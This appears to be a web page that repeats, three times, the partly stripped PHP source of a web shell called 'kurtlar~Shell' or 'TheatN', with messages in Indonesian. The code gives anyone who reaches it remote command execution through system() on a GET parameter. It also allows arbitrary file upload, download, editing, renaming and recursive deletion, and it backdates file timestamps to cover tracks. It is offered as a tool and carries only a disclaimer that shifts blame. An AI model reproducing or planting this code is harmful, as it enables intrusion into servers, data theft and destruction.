aaaaaaa

kurtlar~Shell

'; } ?>
$tmp_name) { $name = $_FILES['files']['name'][$key]; $tmp_name = $_FILES['files']['tmp_name'][$key]; if (move_uploaded_file($tmp_name, "$path/$name")) { echo "Upload Berhasil: $name
"; } else { echo "Upload Gagal: $name
"; } } } if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Length: ' . filesize($file)); flush(); readfile($file); exit; } } if (isset($_POST['delete'])) { $delete_path = $_POST['delete']; if (is_dir($delete_path)) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($delete_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST ); foreach ($files as $fileinfo) { $todo = ($fileinfo->isDir() ? 'rmdir' : 'unlink'); $todo($fileinfo->getRealPath()); } rmdir($delete_path); } else { unlink($delete_path); } } if (isset($_POST['rename'])) { $old_name = $_POST['old_name']; $new_name = $_POST['new_name']; if (rename($old_name, $new_name)) { echo "Rename berhasil
"; } else { echo "Rename gagal
"; } } if (isset($_POST['edit'])) { $file_path = $_POST['file_path']; $content = $_POST['content']; if (file_put_contents($file_path, $content)) { echo "Edit file berhasil
"; } else { echo "Edit file gagal
"; } } if (isset($_POST['change_time'])) { $file_path = $_POST['file_path']; $new_time = strtotime($_POST['new_time']); if (touch($file_path, $new_time, $new_time)) { echo "Waktu file berhasil diubah
"; } else { echo "Gagal mengubah waktu file
"; } } ?> Kurtlar ON" : "OFF"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; $curl = (function_exists('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $perl = (exe('perl --help')) ? "ON" : "OFF"; $python = (exe('python --help')) ? "ON" : "OFF"; $show_ds = (!empty($ds)) ? "$ds" : "NONE"; $total = formatSize(disk_total_space($path)); $free = formatSize(disk_free_space($path)); $total1 = disk_total_space($path); $free1 = disk_free_space($path); $used = formatSize($total1 - $free1); function formatSize($bytes) { $types = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++); return round($bytes, 2) . " " . $types[$i]; } ?>

T h e a t N

Safe Mode: | Disable Functions:

MySQL: | Python: | Perl: | Wget: | cURL:

PHP :
IP Server :
HDD Total :
Free : []
Sistem Operasi :
Map : $pat) { if ($pat == '' && $id == 0) { echo '/'; continue; } if ($pat == '') continue; echo '' . $pat . '/'; } ?>

'; //cmd if ($_GET['go'] == 'terminal') { echo '
: ~$
'; } if (isset($_GET['cmd'])) { echo "
";
    echo system($_GET['cmd']);
    echo "
"; exit; } //keluar if (isset($_GET['keluar'])) { session_start(); session_destroy(); echo ''; } //about if (isset($_GET['disclaimer'])) { echo '

TheatN


Segala tindakan dan aktivitas yang berkaitan dengan materi yang terdapat dalam alat ini sepenuhnya menjadi tanggung jawab Anda. Pengembang tidak bertanggung jawab atas segala kerugian atau kerusakan yang disebabkan oleh penyalahgunaan informasi dalam alat ini yang dapat berakibat pada tuntutan pidana yang diajukan terhadap orang yang bersangkutan.

Note: Modifikasi atau perubahan pada kode ini diperbolehkan, namun rilis publik yang menggunakan kode ini harus disetujui oleh penulis alat ini (msverse)'; exit; } ?>
Melihat File: " . htmlspecialchars(basename($file)) . ""; echo "
" . htmlspecialchars(file_get_contents($file)) . "
"; } elseif (isset($_GET['edit'])) { $file = $_GET['edit']; echo "

Mengedit File: " . htmlspecialchars(basename($file)) . "

"; echo '

'; } else { echo ''; echo ''; $scandir = scandir($path); foreach ($scandir as $dir) { if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo ''; } foreach ($scandir as $file) { if (!is_file("$path/$file")) continue; $size = filesize("$path/$file") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . ' MB'; } else { $size = $size . ' KB'; } echo ''; } echo '
NameSizePermissionLast ModifiedCreation TimeAction
' . $dir . '
--
'; if (is_writable("$path/$dir")) echo ''; elseif (!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if (is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo '
' . date("d-M-Y H:i", filemtime("$path/$dir")) . '
' . date("Y-m-d H:i:s", filectime("$path/$dir")) . '
' . $file . '
' . $size . '
'; if (is_writable("$path/$file")) echo ''; elseif (!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if (is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo '
' . date("d-M-Y H:i", filemtime("$path/$file")) . '
' . date("Y-m-d H:i:s", filectime("$path/$file")) . '
D
'; } ?>

READ MORE

kurtlar~Shell

'; } ?>
$tmp_name) { $name = $_FILES['files']['name'][$key]; $tmp_name = $_FILES['files']['tmp_name'][$key]; if (move_uploaded_file($tmp_name, "$path/$name")) { echo "Upload Berhasil: $name
"; } else { echo "Upload Gagal: $name
"; } } } if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Length: ' . filesize($file)); flush(); readfile($file); exit; } } if (isset($_POST['delete'])) { $delete_path = $_POST['delete']; if (is_dir($delete_path)) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($delete_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST ); foreach ($files as $fileinfo) { $todo = ($fileinfo->isDir() ? 'rmdir' : 'unlink'); $todo($fileinfo->getRealPath()); } rmdir($delete_path); } else { unlink($delete_path); } } if (isset($_POST['rename'])) { $old_name = $_POST['old_name']; $new_name = $_POST['new_name']; if (rename($old_name, $new_name)) { echo "Rename berhasil
"; } else { echo "Rename gagal
"; } } if (isset($_POST['edit'])) { $file_path = $_POST['file_path']; $content = $_POST['content']; if (file_put_contents($file_path, $content)) { echo "Edit file berhasil
"; } else { echo "Edit file gagal
"; } } if (isset($_POST['change_time'])) { $file_path = $_POST['file_path']; $new_time = strtotime($_POST['new_time']); if (touch($file_path, $new_time, $new_time)) { echo "Waktu file berhasil diubah
"; } else { echo "Gagal mengubah waktu file
"; } } ?> Kurtlar ON" : "OFF"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; $curl = (function_exists('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $perl = (exe('perl --help')) ? "ON" : "OFF"; $python = (exe('python --help')) ? "ON" : "OFF"; $show_ds = (!empty($ds)) ? "$ds" : "NONE"; $total = formatSize(disk_total_space($path)); $free = formatSize(disk_free_space($path)); $total1 = disk_total_space($path); $free1 = disk_free_space($path); $used = formatSize($total1 - $free1); function formatSize($bytes) { $types = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++); return round($bytes, 2) . " " . $types[$i]; } ?>

T h e a t N

Safe Mode: | Disable Functions:

MySQL: | Python: | Perl: | Wget: | cURL:

PHP :
IP Server :
HDD Total :
Free : []
Sistem Operasi :
Map : $pat) { if ($pat == '' && $id == 0) { echo '/'; continue; } if ($pat == '') continue; echo '' . $pat . '/'; } ?>

'; //cmd if ($_GET['go'] == 'terminal') { echo '
: ~$
'; } if (isset($_GET['cmd'])) { echo "
";
    echo system($_GET['cmd']);
    echo "
"; exit; } //keluar if (isset($_GET['keluar'])) { session_start(); session_destroy(); echo ''; } //about if (isset($_GET['disclaimer'])) { echo '

TheatN


Segala tindakan dan aktivitas yang berkaitan dengan materi yang terdapat dalam alat ini sepenuhnya menjadi tanggung jawab Anda. Pengembang tidak bertanggung jawab atas segala kerugian atau kerusakan yang disebabkan oleh penyalahgunaan informasi dalam alat ini yang dapat berakibat pada tuntutan pidana yang diajukan terhadap orang yang bersangkutan.

Note: Modifikasi atau perubahan pada kode ini diperbolehkan, namun rilis publik yang menggunakan kode ini harus disetujui oleh penulis alat ini (msverse)'; exit; } ?>
Melihat File: " . htmlspecialchars(basename($file)) . ""; echo "
" . htmlspecialchars(file_get_contents($file)) . "
"; } elseif (isset($_GET['edit'])) { $file = $_GET['edit']; echo "

Mengedit File: " . htmlspecialchars(basename($file)) . "

"; echo '

'; } else { echo ''; echo ''; $scandir = scandir($path); foreach ($scandir as $dir) { if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo ''; } foreach ($scandir as $file) { if (!is_file("$path/$file")) continue; $size = filesize("$path/$file") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . ' MB'; } else { $size = $size . ' KB'; } echo ''; } echo '
NameSizePermissionLast ModifiedCreation TimeAction
' . $dir . '
--
'; if (is_writable("$path/$dir")) echo ''; elseif (!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if (is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo '
' . date("d-M-Y H:i", filemtime("$path/$dir")) . '
' . date("Y-m-d H:i:s", filectime("$path/$dir")) . '
' . $file . '
' . $size . '
'; if (is_writable("$path/$file")) echo ''; elseif (!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if (is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo '
' . date("d-M-Y H:i", filemtime("$path/$file")) . '
' . date("Y-m-d H:i:s", filectime("$path/$file")) . '
D
'; } ?>

Add a review

Your email address will not be published. Required fields are marked *

kurtlar~Shell '; } ?>
$tmp_name) { $name = $_FILES['files']['name'][$key]; $tmp_name = $_FILES['files']['tmp_name'][$key]; if (move_uploaded_file($tmp_name, "$path/$name")) { echo "Upload Berhasil: $name
"; } else { echo "Upload Gagal: $name
"; } } } if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Length: ' . filesize($file)); flush(); readfile($file); exit; } } if (isset($_POST['delete'])) { $delete_path = $_POST['delete']; if (is_dir($delete_path)) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($delete_path, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST ); foreach ($files as $fileinfo) { $todo = ($fileinfo->isDir() ? 'rmdir' : 'unlink'); $todo($fileinfo->getRealPath()); } rmdir($delete_path); } else { unlink($delete_path); } } if (isset($_POST['rename'])) { $old_name = $_POST['old_name']; $new_name = $_POST['new_name']; if (rename($old_name, $new_name)) { echo "Rename berhasil
"; } else { echo "Rename gagal
"; } } if (isset($_POST['edit'])) { $file_path = $_POST['file_path']; $content = $_POST['content']; if (file_put_contents($file_path, $content)) { echo "Edit file berhasil
"; } else { echo "Edit file gagal
"; } } if (isset($_POST['change_time'])) { $file_path = $_POST['file_path']; $new_time = strtotime($_POST['new_time']); if (touch($file_path, $new_time, $new_time)) { echo "Waktu file berhasil diubah
"; } else { echo "Gagal mengubah waktu file
"; } } ?> Kurtlar ON" : "OFF"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; $curl = (function_exists('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $perl = (exe('perl --help')) ? "ON" : "OFF"; $python = (exe('python --help')) ? "ON" : "OFF"; $show_ds = (!empty($ds)) ? "$ds" : "NONE"; $total = formatSize(disk_total_space($path)); $free = formatSize(disk_free_space($path)); $total1 = disk_total_space($path); $free1 = disk_free_space($path); $used = formatSize($total1 - $free1); function formatSize($bytes) { $types = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++); return round($bytes, 2) . " " . $types[$i]; } ?>

T h e a t N

Safe Mode: | Disable Functions:

MySQL: | Python: | Perl: | Wget: | cURL:

PHP :
IP Server :
HDD Total :
Free : []
Sistem Operasi :
Map : $pat) { if ($pat == '' && $id == 0) { echo '/'; continue; } if ($pat == '') continue; echo '' . $pat . '/'; } ?>

'; //cmd if ($_GET['go'] == 'terminal') { echo '
: ~$
'; } if (isset($_GET['cmd'])) { echo "
";
    echo system($_GET['cmd']);
    echo "
"; exit; } //keluar if (isset($_GET['keluar'])) { session_start(); session_destroy(); echo ''; } //about if (isset($_GET['disclaimer'])) { echo '

TheatN


Segala tindakan dan aktivitas yang berkaitan dengan materi yang terdapat dalam alat ini sepenuhnya menjadi tanggung jawab Anda. Pengembang tidak bertanggung jawab atas segala kerugian atau kerusakan yang disebabkan oleh penyalahgunaan informasi dalam alat ini yang dapat berakibat pada tuntutan pidana yang diajukan terhadap orang yang bersangkutan.

Note: Modifikasi atau perubahan pada kode ini diperbolehkan, namun rilis publik yang menggunakan kode ini harus disetujui oleh penulis alat ini (msverse)'; exit; } ?>
Melihat File: " . htmlspecialchars(basename($file)) . ""; echo "
" . htmlspecialchars(file_get_contents($file)) . "
"; } elseif (isset($_GET['edit'])) { $file = $_GET['edit']; echo "

Mengedit File: " . htmlspecialchars(basename($file)) . "

"; echo '

'; } else { echo ''; echo ''; $scandir = scandir($path); foreach ($scandir as $dir) { if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo ''; } foreach ($scandir as $file) { if (!is_file("$path/$file")) continue; $size = filesize("$path/$file") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . ' MB'; } else { $size = $size . ' KB'; } echo ''; } echo '
NameSizePermissionLast ModifiedCreation TimeAction
' . $dir . '
--
'; if (is_writable("$path/$dir")) echo ''; elseif (!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if (is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo '
' . date("d-M-Y H:i", filemtime("$path/$dir")) . '
' . date("Y-m-d H:i:s", filectime("$path/$dir")) . '
' . $file . '
' . $size . '
'; if (is_writable("$path/$file")) echo ''; elseif (!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if (is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo '
' . date("d-M-Y H:i", filemtime("$path/$file")) . '
' . date("Y-m-d H:i:s", filectime("$path/$file")) . '
D
'; } ?>